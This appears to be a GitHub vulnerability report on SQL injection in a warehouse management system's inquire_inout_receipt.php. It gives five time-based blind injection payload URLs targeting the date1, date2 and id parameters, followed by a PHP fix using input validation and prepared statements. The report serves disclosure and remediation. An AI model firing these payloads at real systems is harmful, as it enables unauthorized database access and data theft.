SQL injection in /test/inquire_inout_receipt.php

Open YanC1e opened this issue 1 month ago • 0 comments

The id, date1 and date2 parameters are injectable, and the principle is almost the same as https://github.com/FeMiner/wms/issues/17. Payload:

/test/inquire_inout_receipt.php?option=date&date1=1' AND (SELECT 3264 FROM (SELECT(SLEEP(5)))THZh)-- SEXh

/test/inquire_inout_receipt.php?option=date&date2=1' AND (SELECT 3264 FROM (SELECT(SLEEP(5)))THZh)-- SEXh

/test/inquire_inout_receipt.php?option=warehouse&id=1' AND (SELECT 3264 FROM (SELECT(SLEEP(5)))THZh)-- SEXh

/test/inquire_inout_receipt.php?option=company&id=1' AND (SELECT 3264 FROM (SELECT(SLEEP(5)))THZh)-- SEXh

/test/inquire_inout_receipt.php?option=type&id=1' AND (SELECT 3264 FROM (SELECT(SLEEP(5)))THZh)-- SEXh

YanC1e, Jan 27 '25 17:01
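
One way to close the injection points reported above, as an added example that is not the wms project's code: strict validation of `id`, `date1` and `date2`, a fixed column map for `option`, and prepared statements. The `receipt` table, its column names, the helper names, the requirement that both dates be supplied, and the in-memory SQLite demo are assumptions.

```php
<?php
// Added example; table/column names are assumptions, not the project's schema.

// Accept only a strict calendar date (YYYY-MM-DD).
function parse_date($raw): ?string {
    if (!is_string($raw)) return null;
    $d = DateTimeImmutable::createFromFormat('!Y-m-d', $raw);
    return ($d !== false && $d->format('Y-m-d') === $raw) ? $raw : null;
}

// Accept only a positive decimal integer.
function parse_id($raw): ?int {
    if (!is_string($raw)) return null;
    $id = filter_var($raw, FILTER_VALIDATE_INT, ['options' => ['min_range' => 1]]);
    return $id === false ? null : $id;
}

// "option" selects a column from a fixed map; user input never names a column.
const ID_COLUMNS = ['warehouse' => 'warehouse_id', 'company' => 'company_id', 'type' => 'type_id'];

function inquire(PDO $db, array $get): array {
    $option = $get['option'] ?? null;
    if ($option === 'date') {
        $d1 = parse_date($get['date1'] ?? null);
        $d2 = parse_date($get['date2'] ?? null);
        if ($d1 === null || $d2 === null) throw new InvalidArgumentException('bad date');
        $stmt = $db->prepare('SELECT * FROM receipt WHERE receipt_date BETWEEN ? AND ?');
        $stmt->execute([$d1, $d2]);
    } elseif (is_string($option) && array_key_exists($option, ID_COLUMNS)) {
        $id = parse_id($get['id'] ?? null);
        if ($id === null) throw new InvalidArgumentException('bad id');
        $stmt = $db->prepare('SELECT * FROM receipt WHERE ' . ID_COLUMNS[$option] . ' = ?');
        $stmt->execute([$id]);
    } else {
        throw new InvalidArgumentException('bad option');
    }
    return $stmt->fetchAll(PDO::FETCH_ASSOC);
}

// Constructed demo on in-memory SQLite (requires pdo_sqlite) so it runs offline.
$db = new PDO('sqlite::memory:', null, null, [PDO::ATTR_ERRMODE => PDO::ERRMODE_EXCEPTION]);
$db->exec('CREATE TABLE receipt (id INTEGER, warehouse_id INTEGER, company_id INTEGER, type_id INTEGER, receipt_date TEXT)');
$db->exec("INSERT INTO receipt VALUES (1, 1, 1, 1, '2025-01-27')");
echo count(inquire($db, ['option' => 'warehouse', 'id' => '1'])), " row(s)\n";
try {   // the issue's payload string in id is rejected before any SQL is built
    inquire($db, ['option' => 'type', 'id' => "1' AND (SELECT 3264 FROM (SELECT(SLEEP(5)))THZh)-- SEXh"]);
} catch (InvalidArgumentException $e) {
    echo 'rejected: ', $e->getMessage(), "\n";
}
```

Validation alone would already reject the reported payloads; binding the values as parameters keeps the query safe even if a validator is later relaxed.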